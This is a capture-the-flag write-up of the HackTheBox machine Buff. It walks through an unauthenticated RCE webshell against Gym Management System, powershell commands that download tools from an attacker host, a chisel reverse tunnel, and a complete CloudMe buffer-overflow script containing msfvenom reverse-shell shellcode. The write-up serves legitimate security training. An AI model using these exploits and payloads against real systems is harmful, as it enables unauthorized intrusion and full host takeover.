HTB: Buff

Buff card

This is a writeup about a retired HacktheBox machine: Buff published on July 18 2020 egotisticalSW This box is classified as an easy machine. The user part just require to exploit a CVE. The root part require first to pivot to access the box's internal services then exploit another CVE.

User

Recon

We start with an nmap scan. Despite being a Windows boxes, only a few services are exposed: A port 8080 for an HTTP service and a port 7680 (probably another HTB user port as we will see at the end of this writeup).

# Nmap 7.80 scan initiated Sat Jul 25 08:59:16 2020 as: nmap -p- -sSV -oN nmap 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)

Web

The website is a promotional website for a Gym.

Buff homepage

We browse the site and found the contact page. On it we can read that the site was "Made using Gym Management Software 1.0".

Despite the site looking like a homemade site for the purpose of the box, this is really a public product with a exploit available.

kali@kali:~$ searchsploit Gym Management
------------------------------------------------ ---------------------------------
Exploit Title                                  |  Path
------------------------------------------------ ---------------------------------
Gym Management System 1.0 - Unauthenticated RCE | php/webapps/48506.py
------------------------------------------------ ---------------------------------

We run the exploit, see who we are and get the user flag.

kali@kali:~$ python2 48506.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>


C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun

C:\xampp\htdocs\gym\upload> type "C:\Users\shaun\Desktop\user.txt"
�PNG

6c675c6c581ec9341b8ed8717c537e32

root

We can use our limited shell to download exec from our kali box (running a simple python HTTP server) and execute them. For instance we can run winPEAS

C:\xampp\htdocs\gym\upload> powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.24:8080/winPEAS.exe', '.\winPEAS.exe')
C:\xampp\htdocs\gym\upload> .\winPEAS.exe
<SNIP>

Cloudme

Still browsing our user's folders we found an specific binary in Downloads: CloudMe_1112.exe.

C:\xampp\htdocs\gym\upload> dir "C:\Users\Shaun\Downloads"
�PNG

Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users\Shaun\Downloads

14/07/2020  13:27    <DIR>          .
14/07/2020  13:27    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
              1 File(s)     17,830,824 bytes
              2 Dir(s)   9,639,174,144 bytes free

This also is a public software with some exploit available. For our specific version (1.11.2), only four exploits applies.

kali@kali:~$ searchsploit cloudme
---------------------------------------------- ---------------------------------
Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)        | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | windows/local/48499.txt
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow   | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow       | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
---------------------------------------------- ---------------------------------

But as we saw earlier only the port 8080 is open on the box. The CloudMe software is only running locally on the box. We need to use some pivoting technique to access the internal box services in order to use the exploit 44470.py.

#######################################################
# Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
# Date: 08.03.2018
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1110.exe
# Category: Local
# Exploit Discovery: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 1.11.0
# Tested on: Windows 7 SP1 x86
# CVE: CVE-2018-7886
# Solution: Update CloudMe Sync to 1.11.2
#######################################################

#Disclosure Date: March 12, 2018
#Response Date: March 14, 2018
#Bug Fixed: April 12, 2018

# Run this file in victim's win 7 sp1 x86 system where CloudMe Sync 1.11.0 has been installed.

import socket

target="127.0.0.1"

junk="A"*1052

eip="\x7B\x8A\xA9\x68"      #68a98a7b : JMP ESP - Qt5Core.dll

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f c

shellcode=( "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a\x0e\x18\x68"
"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")

payload=junk+eip+shellcode

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)

chisel

We will use chisel in order to access CloudMe service.

On our kali we run chisel in server mode.

./chisel_1.6.0_linux_amd64 server -p 9001 -reverse

Using our limited shell we download our chisel binary on the box and run it as client on port 8888 (remember this strange open port on the nmap scan?) as CloudMe is also running on port 8888 (as stated on the exploit 44770.py).

C:\xampp\htdocs\gym\upload> powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.24:8080/chisel.exe', '.\chisel.exe')"
C:\xampp\htdocs\gym\upload> .\chisel.exe client 10.10.14.24:9001 R:8888:localhost:8888

The exploit 44770.py also told us to generate a new shellcode using msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f c

We update the script with our shell code, configure the metasploit handler and run it as well as the exploit script (with python 44470.py) . We got a shell as administrator and can get the root flag.

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.198:53234) at 2020-07-25 12:07:33 -0400

whoami
whoami
buff\administrator

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
4ea57b2b8df4db2ea72531bcc50c5a86

Wrapping up

This box was really quick as it only require to exploit two CVE. The pivoting technique was an interesting complication for an easy HTB machine.